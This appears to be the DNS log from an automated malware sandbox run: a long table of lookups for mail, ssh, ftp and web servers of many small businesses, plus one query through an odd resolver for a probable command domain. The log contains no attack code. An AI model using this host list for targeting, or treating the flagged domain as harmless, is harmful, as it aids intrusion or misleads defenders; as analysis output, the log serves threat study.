                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.246874094 CET1.1.1.1192.168.2.40x65e6Name error (3)enp.ericsson.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.250030041 CET1.1.1.1192.168.2.40x7f2fServer failure (2)daxter.fsnet.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.257740021 CET1.1.1.1192.168.2.40x2124Name error (3)konic.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.277127981 CET1.1.1.1192.168.2.40x5f17No error (0)mx.a.locaweb.com.br186.202.4.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.282457113 CET1.1.1.1192.168.2.40xfa26No error (0)st-comet.com164.46.93.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.283694029 CET1.1.1.1192.168.2.40xabafNo error (0)mxi.alpha-prm.jp157.205.8.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.285130024 CET1.1.1.1192.168.2.40x9b3cName error (3)gabio.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.292471886 CET1.1.1.1192.168.2.40xc273No error (0)st-comet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.296324015 CET1.1.1.1192.168.2.40x9973No error (0)hokal.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.296324015 CET1.1.1.1192.168.2.40x9973No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.296324015 CET1.1.1.1192.168.2.40x9973No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.296324015 CET1.1.1.1192.168.2.40x9973No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.314192057 CET1.1.1.1192.168.2.40x8783No error (0)relay.exohosting.sk92.240.253.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.314290047 CET1.1.1.1192.168.2.40xbb5eNo error (0)preda.pl89.161.228.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.314390898 CET1.1.1.1192.168.2.40x5cf7Name error (3)clickbkk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.318311930 CET1.1.1.1192.168.2.40x9791Name error (3)gryffindorhouse.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.332020044 CET1.1.1.1192.168.2.40xe890No error (0)mx3.webhouse.sk46.229.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.348839998 CET1.1.1.1192.168.2.40xebc7No error (0)mx2.mail.hostpoint.ch217.26.49.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.402704000 CET1.1.1.1192.168.2.40xba4dNo error (0)brightright.com68.233.46.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.423424006 CET1.1.1.1192.168.2.40x2398Name error (3)nippondotech.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.423705101 CET1.1.1.1192.168.2.40xaa13No error (0)mailin1.izberatel.sk45.13.137.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.424926043 CET1.1.1.1192.168.2.40x6d55No error (0)escolapatelli.com.br50.116.86.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.426367044 CET1.1.1.1192.168.2.40x1dd6No error (0)mailin1.aloeveraforever.sk45.13.137.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.438534975 CET1.1.1.1192.168.2.40x9c87No error (0)instalanova.sk92.240.253.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.446312904 CET1.1.1.1192.168.2.40x89b4No error (0)mx1.webhouse.sk93.184.77.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.459391117 CET1.1.1.1192.168.2.40xf829No error (0)email.eshopy-katalog.sk141.98.102.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.468277931 CET1.1.1.1192.168.2.40x91e8No error (0)s-kotobuki-s.co.jp164.46.121.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.469928026 CET1.1.1.1192.168.2.40x7bbfNo error (0)janckulik.sk193.163.77.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.482337952 CET1.1.1.1192.168.2.40x41aaNo error (0)sluchatka.sk85.248.130.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.500960112 CET1.1.1.1192.168.2.40x778eNo error (0)rotas.sk46.229.230.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.502341986 CET1.1.1.1192.168.2.40xe81aNo error (0)predajpaliet.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.515645027 CET1.1.1.1192.168.2.40xe5afNo error (0)mailhost01.rkd.sk62.168.119.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.520823002 CET1.1.1.1192.168.2.40xaebcNo error (0)mx.elteconline.com62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.521929979 CET1.1.1.1192.168.2.40xe72dNo error (0)mailin1.kanapy.sk45.13.137.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.524981022 CET1.1.1.1192.168.2.40xe4efNo error (0)mx2.hostcreators.sk217.61.3.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.548249960 CET1.1.1.1192.168.2.40xfdc8No error (0)gw1.mx.anafra.net77.93.220.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.586862087 CET1.1.1.1192.168.2.40x8327No error (0)inmail.webglobe.sk185.65.223.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.586862087 CET1.1.1.1192.168.2.40x8327No error (0)inmail.webglobe.sk62.109.128.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.589025021 CET1.1.1.1192.168.2.40x53b6No error (0)emr.com.ar66.97.32.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.609507084 CET1.1.1.1192.168.2.40xc211No error (0)elektrospol.sk46.229.230.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.636929989 CET1.1.1.1192.168.2.40x1a5eNo error (0)ax-sk1-mx4.ignum.eu62.109.128.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.666187048 CET1.1.1.1192.168.2.40x5dceNo error (0)server1.floxm.com178.238.40.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.785082102 CET1.1.1.1192.168.2.40xae1cNo error (0)mx.predan.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.864202976 CET1.1.1.1192.168.2.40x732fNo error (0)fosse.virtualhosting.hk103.19.26.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.970849991 CET1.1.1.1192.168.2.40xcff0No error (0)predan.it89.46.109.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.997507095 CET1.1.1.1192.168.2.40x431dNo error (0)mail.emr.com.ar66.97.32.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.067441940 CET1.1.1.1192.168.2.40xb327No error (0)mx.emmetisportfun.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.079711914 CET1.1.1.1192.168.2.40x87f8No error (0)ssh.justdave.net173.236.212.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.102008104 CET1.1.1.1192.168.2.40x27d7No error (0)ssh.aloeveraforever.sk37.9.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.104053020 CET1.1.1.1192.168.2.40x57a8Name error (3)ssh.e-art-studio.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.104067087 CET1.1.1.1192.168.2.40x69f3No error (0)ftp.e-art-studio.co.jp216.230.253.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.216928959 CET1.1.1.1192.168.2.40x7fe4No error (0)ssh.detmar.skdetmar.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.216928959 CET1.1.1.1192.168.2.40x7fe4No error (0)detmar.sk185.32.160.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.220058918 CET1.1.1.1192.168.2.40xbabaNo error (0)ftp.detmar.skdetmar.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.220058918 CET1.1.1.1192.168.2.40xbabaNo error (0)detmar.sk185.32.160.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.310553074 CET1.1.1.1192.168.2.40xa0dbNo error (0)sport-tour.sk178.238.43.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.337266922 CET1.1.1.1192.168.2.40xad49No error (0)mail.cesys.eu178.238.43.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.417363882 CET1.1.1.1192.168.2.40xf972No error (0)ssh.abatek.skuseron15.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.417363882 CET1.1.1.1192.168.2.40xf972No error (0)useron15.hostmaster.sk46.229.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.448329926 CET1.1.1.1192.168.2.40x4fNo error (0)ftp.abatek.skuseron15.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.448329926 CET1.1.1.1192.168.2.40x4fNo error (0)useron15.hostmaster.sk46.229.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.061242104 CET1.1.1.1192.168.2.40x7bc0No error (0)www.kompresory-servis.skkompresory-servis.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.061242104 CET1.1.1.1192.168.2.40x7bc0No error (0)kompresory-servis.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.220021009 CET1.1.1.1192.168.2.40x8c7eName error (3)aquamat-liptov.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.251831055 CET1.1.1.1192.168.2.40x2b16Name error (3)merlynsociety.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.287539005 CET1.1.1.1192.168.2.40x2d15Name error (3)eluxviaggi.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.423080921 CET1.1.1.1192.168.2.40x50a8No error (0)rotas-sk.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.423080921 CET1.1.1.1192.168.2.40x50a8No error (0)rotas-sk.mail.protection.outlook.com104.47.17.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.479788065 CET1.1.1.1192.168.2.40x7c6cNo error (0)www.detmar.skdetmar.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.479788065 CET1.1.1.1192.168.2.40x7c6cNo error (0)detmar.sk185.32.160.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.481045961 CET1.1.1.1192.168.2.40xeab6No error (0)mail.inhodinky.sk37.9.175.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.483582020 CET1.1.1.1192.168.2.40xbafcNo error (0)mailgate.inhodinky.sk85.248.129.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.483582020 CET1.1.1.1192.168.2.40xbafcNo error (0)mailgate.inhodinky.sk85.248.129.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.483582020 CET1.1.1.1192.168.2.40xbafcNo error (0)mailgate.inhodinky.sk85.248.129.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.595890045 CET1.1.1.1192.168.2.40x98b2No error (0)ftp.eshopy-katalog.sk141.98.102.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.766119957 CET1.1.1.1192.168.2.40x27c1No error (0)mail.s-kotobuki-s.co.jp164.46.121.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.794714928 CET1.1.1.1192.168.2.40x2f76No error (0)mailin1.inhodinky.sk37.9.169.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.902142048 CET1.1.1.1192.168.2.40xfc64Server failure (2)straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.902152061 CET1.1.1.1192.168.2.40xfc64Server failure (2)straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.902160883 CET1.1.1.1192.168.2.40xfc64Server failure (2)straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.976691008 CET1.1.1.1192.168.2.40x665No error (0)mail.escolapatelli.com.br50.116.86.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.228009939 CET1.1.1.1192.168.2.40x9cd4No error (0)mail.st-comet.com164.46.93.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.306282043 CET1.1.1.1192.168.2.40xa271No error (0)ftp.kompresory-servis.skkompresory-servis.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.306282043 CET1.1.1.1192.168.2.40xa271No error (0)kompresory-servis.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.566570044 CET1.1.1.1192.168.2.40x835bNo error (0)www.hugedomains.com104.26.6.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.566570044 CET1.1.1.1192.168.2.40x835bNo error (0)www.hugedomains.com172.67.70.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.566570044 CET1.1.1.1192.168.2.40x835bNo error (0)www.hugedomains.com104.26.7.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.717947960 CET1.1.1.1192.168.2.40xe986No error (0)profisign-sk.sk93.185.102.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.777916908 CET1.1.1.1192.168.2.40x19e8No error (0)ftp.justdave.net173.236.212.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.919857979 CET1.1.1.1192.168.2.40x5fadNo error (0)www.oitacity.jpoitacity.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.919857979 CET1.1.1.1192.168.2.40x5fadNo error (0)oitacity.jp59.106.13.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.227655888 CET1.1.1.1192.168.2.40x500bNo error (0)www.inhodinky.sk85.248.129.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.227655888 CET1.1.1.1192.168.2.40x500bNo error (0)www.inhodinky.sk85.248.129.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.227655888 CET1.1.1.1192.168.2.40x500bNo error (0)www.inhodinky.sk85.248.129.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.255153894 CET1.1.1.1192.168.2.40x88b0Name error (3)ftp.dobrybicykel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.265825033 CET1.1.1.1192.168.2.40xcd82No error (0)www.emmetisportfun.it89.46.109.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.267000914 CET1.1.1.1192.168.2.40x9418Server failure (2)ftp.daxter.fsnet.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.267760992 CET1.1.1.1192.168.2.40x4439Name error (3)ftp.gabio.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.292232037 CET1.1.1.1192.168.2.40x870cName error (3)ftp.clickbkk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.360953093 CET1.1.1.1192.168.2.40x686eNo error (0)www.predan.it89.46.109.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.382622004 CET1.1.1.1192.168.2.40x4977No error (0)www.elteconline.com86.107.32.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.394153118 CET1.1.1.1192.168.2.40xe8d3No error (0)www.kingsway-hk.comwww149.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.394153118 CET1.1.1.1192.168.2.40xe8d3No error (0)www149.wixdns.netcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.394153118 CET1.1.1.1192.168.2.40xe8d3No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.394153118 CET1.1.1.1192.168.2.40xe8d3No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.395382881 CET1.1.1.1192.168.2.40x1761Name error (3)ssh.kingsway-hk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.439291954 CET1.1.1.1192.168.2.40xed3aName error (3)ftp.konic.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.514697075 CET1.1.1.1192.168.2.40xa366No error (0)www.sluchatka.sk85.248.130.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.638350964 CET1.1.1.1192.168.2.40xd918No error (0)www.elektrospol.skuseron17.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.638350964 CET1.1.1.1192.168.2.40xd918No error (0)useron17.hostmaster.sk46.229.230.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.656414986 CET1.1.1.1192.168.2.40x29c1No error (0)www.eurisproagro.skuseron22.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.656414986 CET1.1.1.1192.168.2.40x29c1No error (0)useron22.hostmaster.sk46.229.230.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.657320976 CET1.1.1.1192.168.2.40x8141No error (0)www.abatek.skuseron15.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.657320976 CET1.1.1.1192.168.2.40x8141No error (0)useron15.hostmaster.sk46.229.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.712205887 CET1.1.1.1192.168.2.40xc3fdName error (3)ivory.plala.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.758333921 CET1.1.1.1192.168.2.40x8aefNo error (0)www.predajpaliet.skpredajpaliet.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.758333921 CET1.1.1.1192.168.2.40x8aefNo error (0)predajpaliet.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.965046883 CET1.1.1.1192.168.2.40x2909No error (0)www.izberatel.skc1.webareal.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.965046883 CET1.1.1.1192.168.2.40x2909No error (0)c1.webareal.sk81.0.206.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.235162020 CET1.1.1.1192.168.2.40xd845No error (0)www.sport-tour.sk178.238.43.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.282447100 CET1.1.1.1192.168.2.40xd845No error (0)www.sport-tour.sk178.238.43.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.972961903 CET1.1.1.1192.168.2.40xc376Server failure (2)mail.straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.972989082 CET1.1.1.1192.168.2.40xc376Server failure (2)mail.straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.973020077 CET1.1.1.1192.168.2.40xc376Server failure (2)mail.straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:58.897226095 CET152.89.198.214192.168.2.40x587fNo error (0)bparowe.com185.196.8.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.523993015 CET1.1.1.1192.168.2.40x4192No error (0)imap.inhodinky.sk37.9.175.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.610546112 CET1.1.1.1192.168.2.40xa6c2No error (0)hokal.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.610546112 CET1.1.1.1192.168.2.40xa6c2No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.610546112 CET1.1.1.1192.168.2.40xa6c2No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
